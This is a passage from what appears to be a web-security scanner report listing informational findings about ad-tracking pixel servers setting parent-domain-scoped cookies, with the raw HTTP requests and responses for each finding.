Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DEF70A05013F13-40000109A0000067[CE]; Expires=Fri, 29 Apr 2016 23:34:44 GMT; Domain=.washingtonpost.com; Path=/
Location: http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692?AQB=1&pccr=true&vidn=26DEF70A05013F13-40000109A0000067&&ndh=1&t=1%2F4%2F2011%2023%3A33%3A45%200%20300&ce=UTF-8&ns=wpni&pageName=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&g=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&cc=USD&ch=wp%20-%20jobs&server=washingtonpost.com%20jobs&v0=AG0002174&events=event1&v1=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&h1=jobs%7Cfront&v2=wp%20-%20jobs&h2=washingtonpost.com%7Cjobs%7Cfront&c8=Monday&c9=12%3A30AM&c10=Weekday&v14=New&v15=First%20Visit&v16=1&c17=First%20Visit&c18=New&c23=jobs%7Cfront&c32=application%20-%20jobs%20cluster%20-%20jobs&c33=anonymous&c34=Commercial&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=983&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 30 Apr 2011 23:34:44 GMT
Last-Modified: Mon, 02 May 2011 23:34:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www77
Content-Length: 0
Content-Type: text/plain

16.38. http://pix01.revsci.net/J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif?D=DM%5FLOC%3Dhttp%3A%2F%2Fwww%252Ewashingtonpost%252Ecom%2Fwl%2Fjobs%2Fhome%253Fwpsrc%253DAG0002174%2526keyword%253D4846831919%2526cre%253D430450907%2526g%253D1%2526s%5Fkwcid%253DTC%2D21380%2D4846831919%2De%2D430450907%2526thisNode%253Dhome%252Ejsp%26DM%5FREF%3D%26DM%5FTIT%3DWashington%20DC%20Area%20Jobs%20%2526%20Careers%3A%20Find%20Your%20Perfect%20Job%2C%20Search%20Now%21%26DM%5FEOM%3D1 HTTP/1.1
Host: pix01.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4ddcf645&0&&4db782ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4ddd4f0f&0&&4db785ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4ddd5040&0&&4db783f9&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4ddd7ae8&0&&4db793f3&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9SENLipv597JLOz4/ywNPTNxEVAOIYCdRelXOzKIRj+39hgkAwD0RltVgL5OR8z4ufqL2JTRgutCG8bH0i2CxMBFHo63bCHdwHxB4BmexyTA8QJJCrTjwem4Rz6vlfmAXZaPkg3/fgGQdxMq5vA03XyhyjKjrmnx6+FJVKmvq1UtLolE/wIYHveGzjeajpDXWQ1J7CBJjBz4B6eDrX2L08P9ZFPE6oRnJWx8uw8wJBAU393RlttIzV+Qhn8MKk7OQiBDL0BgW4aB/MRo1q9ia3EciExyL5yLPHJjIBNhX+QqfSs5Cl4QzaZ9F29c1QiBqzSWOiWdhbBatzmnixywgT8lvFnT4QL3q0Cj3x9XfuCF0IE+G1vSGcP13Prb15jSRxeRn/X3s2YOmR3K3w4IGfd/riyQEciK7VP3tLodiYFLdClT1RZYi22aneJA71eL7+Ya9/kRvCgp5LiQPt6+rIhd7ZRsW0FEhTWmbpqYcAVEfS0I3sPOGB+WigblQoB5h4djNBQndjcxKmAZ9rGZAPkKN1/UYr+qOjTdwypVpD6P/cdrwUFvb2KW5DQMuxBXRUggNPND2K7/fNsSwE1eFYYWAkfouY3GUlBc02ZuTo+msRjGLZflLAgjK0YKoR5qRhxh1tf+3K1rpnLvPkp9vz9k6PHr4SmrbNefYS1eYWN06OW5SgSYNzlmltyIXRjTzJ8Xgexa9RpvUyxXuyDstcFfBbATJM8gsWvZXVRC05ZxtEuXSpyGib+Z7pD1NAV6PTRkoBxWal3h6saqOb3SGIeMNBJ+jx1JOF1QF42HSqHlryDRDZ5kreBCo098HNm2PCKxfBeYNL4lcGIeYBXTb/+QAoqh0PqlKL5XqdArvsfziWOyLnTh0Kkq8XB7bLjOyK6x1DYKg7uumGCcuzXWMeutXR1EGd5ZojkPFq4/lhF8bFM8/2VZOLN5O155wZf/X9644rvMJpsKp1BZrHZs+/rpF/6Vg/uo2+obA/ipqe7I7Oj/r9T/PZFmGD8BtQINx/SgMTB6KGjn2nGlqBU7iD6LVv3qvJufGtydaJV+FYH7rLKOx0NULq5A+/LZTT6GsUoR2IuhBzpInYsMMiKmKHRhIz3Kvyhv0Y39fsTnOpUH1Ya0wDfK43SrYmnk/T0ct1UlNAk1bx10Q1aY7bidfsGH4wyNw/B//zjaHmOf17HK; rsi_segs_1000000=pUP15jOFb3IQDqIu1Hhm/da3+uSni//DBRincYhphhdmEVPNelSxYUS4+U1Joi+vXIZg3CJmbl6qO0d3dqlvOWYpudTV4Voav+Q+5zpE+UjDPyzpV/8S6whLBR2lB2WawM3t+Fb3ocE+VD+HVCzXcWQrjQd9nfMwL8eiWwp5rJfCON223S82t0AJ7E0fYcONDby07hqAtzkyS/Zh39I6n85ANWCrqvA4l/0dGi3VrJ+5ZyaadxnN/OBC4X5GhWxfABQU5Rl8fKTwUYRcs7znb3Qum3v0KY3igmRpDolWPrACkf1Hc6JQwYLC4MGoQsiXhR/YGQoGf7hVpjxwR4y+8tHqy008ecCB0dNuqTRG; rtc_xaNz=MLsHtSEOYQ5jJhFEjE7V7MKBJ1QDGTL0xZ7zF8dplkWrbITDjmJ8eM707TdmNgaI0g3GXcR/P4Fxz8PfR2IjDW2RJK83tn47FGJ7fdq8ELqyjVgasfcuWDjdORh1shdmyU9uxedGSanbaBz1PaqWM/PREGl/m/qeHXc/WZH+Dgo6X96L+pCBorF+TNxQRAWfzWjMj2I8o9ObxoZCICuBK1/2qL55SlebEPPHZZv0mxkLGyY/WIYPOZhhttuMr3Q4z2/BD8O8pL3CkSzGuuDTvaTc4qCxMoP2Jezab7Qw87iMMi0epru/jxgjCl9WnuD2iMP9Ckn5dTYpQVfaoTdsNkpA7y2M06nH6rH4wEcBgkSx/uBET30t3wIlJ6HsTseIP1z5gWfvqaDt/JAuZpm/cJa2QAmWLJl6wswHJo+HB/6sevl3T1Ahn4inevXQhVzP5SzYP4YkU+DIxlvIq5DKRzbtlJ+t0ni/DWuiUJb+DLW3NUMwiGFMTXNUcvEZk1zr7Qd9etu3kEz3AzjYrZbAyqyXgsLC1QaEfLCSooqB14xwUHyaOJV823ccZQxty6+H4QCPsf4KNBH5KTfvm33EtmPRX6H55suB1YW3hnQdc9AiiXRQag323RigTOhwsgA1U0SNCgdSSrIaUdceMZt7Nt8gD1OxVsOQvH4cKbfBNN5SQzH23EjjvuKap8ozWuTb3OKqW9ddvuo/LcB4KOuJxI03Yohpr3qjo3F91PC+X25pmiXd3QIi; rsiPus_KoZy="MLsXrl8OZi5n4BD3cBZyjuABuWC4Csb0FwUT+Tf/ra2F23Yr8I/oeuwGctxr0i9k80z5+Ts37HpJWH5tx7ymALJCD0jt3YjxTTdM3JvgE976HlS8BET9gOVhjUYb6nxqMxO2LSljPwK3m5C91Tp/+zMbiZ3l0rXTRlqctD+i58MewI/dqdLPzRqf/27Ck4fV/tXYZjC6PsOJ0LP14q9RirhDfT4536oDEBbrBii+FPkl5ulI86i//mF/Ihwohay+AGl7Yn7K2R0FWrjhrOHtaZAMobFZE11r5ProA/7NdGfrf6pDi8cUzwkfwo+puxslrUGAu2uvT5Z0UrY8UwRkxW/vrgzFdXZqCAjwp7vzLO9CE0gZQ7wUlZGJim+VOBL1moOapTPxt4wXMk809VsgCkVFCnZ43yLvCnKFVW67eOExYmd+JNSA6VR1ad6OjY3ES0+TfN1COTV35yB2Je5lVhz8KFs9m3lE6O8klZ3o5XAqY7u1xfcrbqVVmx+aUwamFT5uGIDC3paOb5n5zA0="; rsi_us_1000000="pUMdIz1HMAYU1Q23kD2gQlP9hregpcCW/V5c7M/G6n4W4mvTYenih6EKWpeOr4+Ll/y5R0Unj/LO5PdEBw/eJPglYEstHCojiOu9XSRlWWR/QO1SSuxATYbIb1Lfm+FXekBMjalx+GDpg8auRaANRpH94U/E0lZJWj3fXAp3bIkV5gANlu/6hpI4w2DhRC/NVjY//S1N9dvws5Fcv0coUdJ5ovh/i6KiZ/NTh0SwAPSjFYGtC+n+BhnM7E5ccgkAVCkI932ukgJfzqwALNmXtBxTiwZIth6E1Z2Zd9anAg5EX60juVXtwhNQdqK9t3nO6LbKIyB3MtebdzKy2HVDbRuWLb2lZcUfzB20bxbKl7dD7bFNiKS6voC/k1kAfALYMhC261oMDnN7Pj+HlVnO8O+fDxcFHnLynM7rfPr1Q2PkFDRMIXaVgSfL4HzHiZbZP2AmC8AGdhZxKUfXV4Z99Rc1jtmknr7y9/O2aF45rjN4DXXTL6WcKJVbWylOgxrxUFnOR0S6er3mpddjXfX8uPcdrquy5/WNjZiFo5E9+Vv0DEnaw9phZ0cU7p8Onko84PB5HUGnzJMhBFPJkmmqNZ7LlOfsSRdjb/yPCCEot4PvJfqCpCwPYBz2l4xgSYHCoMHFh+BMm+4H7E+DhB4nCVZr8wEkzjlKDIt0O9cSthlhINJrMKroXythtqiwkeuwjz0Ygb8WpfJnrSOjIsNAt9wP196yM5K/sRFDpa9qA5Lp5nF1wHFHbYkgHAdxcjXpMaVvZ1n0GRjXJDzFqUxnp+5yWhADqUaxQOJ9LOkAGWRyqS1gIgVmxAIVc9d+FAUVCHtXs9sKQrum6vL5mvZt5HdAsvmcqsMTplSR7ALkvg8w3wrl74KIV1pxLFzZKDEAmAj9JSKDhAqlzSkpT9ifpSuGrw+BXDQyuS3hLWRbaSjb3qmhPQln3pZjJlWHUunVoJUbyEpWgRizDaTcMqabtv8+Ronk4VDjkdSas5vuJNKracRLjZa8SPtJdk1o/iLDhC1B6ittEW81WOr3Xm3hK80wa7leBcmEbUn0Hggk0E9lhdVUrOq438eNG/DhIVKO9OC5rYs2ElTc6qyDNdn9bmTUuYjb2jyTEtZAmM73J3hIqp0Nco4jeWB5mfGUj10PwA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_xaNz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP95TOFb3IQDqIu1Hhm9eJF2URyyYddaQTz7GCqw4YkAQ+qw6DMwutBdt7A14dgfNdNJ6boNHoksgj4yo4380GOe0Sly4gefJT6j60BI89IrwI3ERkQN5YzX7WgzdkBuIzeCyU5dWh0FAgZ47wCW2vuLZ+tS/27ziagTP9SATZHprMXjSYHimqnSt3PsWW1ZUw/W5zCuwAjResmzJbCl9JthdiqbMsjkghKMi7yT9T6kQyChlqMgP4aqT7tsmcOD1OLsy5KWuptM4j35YcYAFdcJp/fX5a4t0BTioh7LN+OGQishl0HmZcQTGFp7laT6B4hf5fp2UsWmuRf9bfofL7UdIrBCDeJShiozEtZ8RsSamrMQ/g22rolHVP2OA==; Domain=.revsci.net; Expires=Mon, 30-Apr-2012 23:34:41 GMT; Path=/
Set-Cookie: NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d811&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Sun, 29-May-2011 23:34:41 GMT; Path=/
Set-Cookie: rtc_mXZ-=MLsHtaUqYR5jJ5Eert5J4zjwI0Yn0GUmvNxcOH9aUaXt40tHjX8vrSL6lIJv17IAwX/77DMkdThlYBEtanQjHiBOTu6VdD81U54WgfTp1ulWQP/xIrSVh3NFbdqPsMPlBqqoJaTKM2XOC0KXXykHjW00phpzgWrk4LpEqlq46xWLs8WebFJ9co8dW4ExdEJVKDgVM8TS3zM/XVrNVu1vqBCOR8949nZw1Rcva/IoiyX77p/ovb/wkdFouI4dNNN5sFguHBNMSNcKUIr4/Q000/FakMdPzNkviWS5wioQCKcOtbfqrbkr6GSPK1NhGk9hhZqZEnrdgIqZjIcXu3v0H9kvT36K1eYv/EG6m0azxSgssbCQgxA2vxvOG/PgijkOvxPQ14dIYkdeWaewFfby+BXqLABIuFfg/afjjo1LF7VoWe80jJbRqF4iL6UYvgrGmIXGhHvBq8JUxxzxjUC6vjlOc1jRDeUhU9/dNLgeNBoo30uJG/CIb3MMNIiruc8YYpJWUeKmABKZ7nwF2U/ROk2f7dLVpcm5nZAUNqv1wTjWzD7RzzuLow8xWnlY+oX102McprMcv1+0G5Kls8q9+a0tsc145kfssSlrOk9smBE1n2HcHmYPSuaVWFRpnWa6+VH0U8XuJBBkXxqYgupSZQxvzSHAK/8ls+qf4Pau+uAkrqyXp5REHXpZL52sZJbyyHWba7yWYJG7clfknngWYU5lXnV2Zvuh8+ww6lSRfwcQbNlnEGWf1QyfEdQGwlofRE1s102E9mXqm5DJAPuKMj8YbdK/jxyW0ToaeYF3D5g4gvzMU9i0eEeyksIWBlqKdamr7/vAqdxrH5yA2Q==; Domain=.revsci.net; Expires=Mon, 30-Apr-2012 23:34:41 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 01 May 2011 23:34:41 GMT

GIF89a.............!.......,...........D..;
16.39. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=9&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"3\": 1304303011+ \"2\": 1304243633}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 512
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4316443142505&PixelID=186","javascr
...[SNIP]...
16.40. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=847987400;fpan=0;fpa=P0-1959175184-1304319359595;ns=0;url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml;ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico';ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304319368576;tzo=300;a=p-25XjRGUyZYjok HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGgAD-8kjVmtjIMAAZsBAdMGgZMAmtGCqVKLPR_BodpxqWIBo0wR_hEEAcEgAAAwQBu2S7IMIDXHQxAhGxIBIgGhKLIlCWEAsS0zQjCCAwQY5RAOiSABAshEiysQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=902031&id=1085044&id=1230047&t=2
Set-Cookie: d=ECwAD-8kjVmtjIMAAa0BAdMGgZMAmtGCqVKLPR_Bob88GbPRqWIBo0wR_hEEAcEgAAAwQBu2S7IMIDXHQxAhGxIBIgGhKLIlCWEAsS0zQjCCAwQd0cGoTRAOiSABAr4uGKGRiysQ; expires=Sun, 31-Jul-2011 01:56:08 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 02 May 2011 01:56:08 GMT
Server: QS

16.41. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&expires=180&cb=xy7kwd&next=http%3A%2F%2Fa.triggit.com%2Fpxruourcm HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C208%2C2%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:04:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; expires=Wed, 01-Jun-2011 02:04:53 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C243%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; expires=Wed, 01-Jun-2011 02:04:53 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; expires=Sat, 29-Oct-2011 02:04:53 GMT; path=/; domain=.rubiconproject.com
Location: http://a.triggit.com/pxruourcm
Content-Length: 0
Content-Type: text/html; charset=UTF-8

16.42. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbt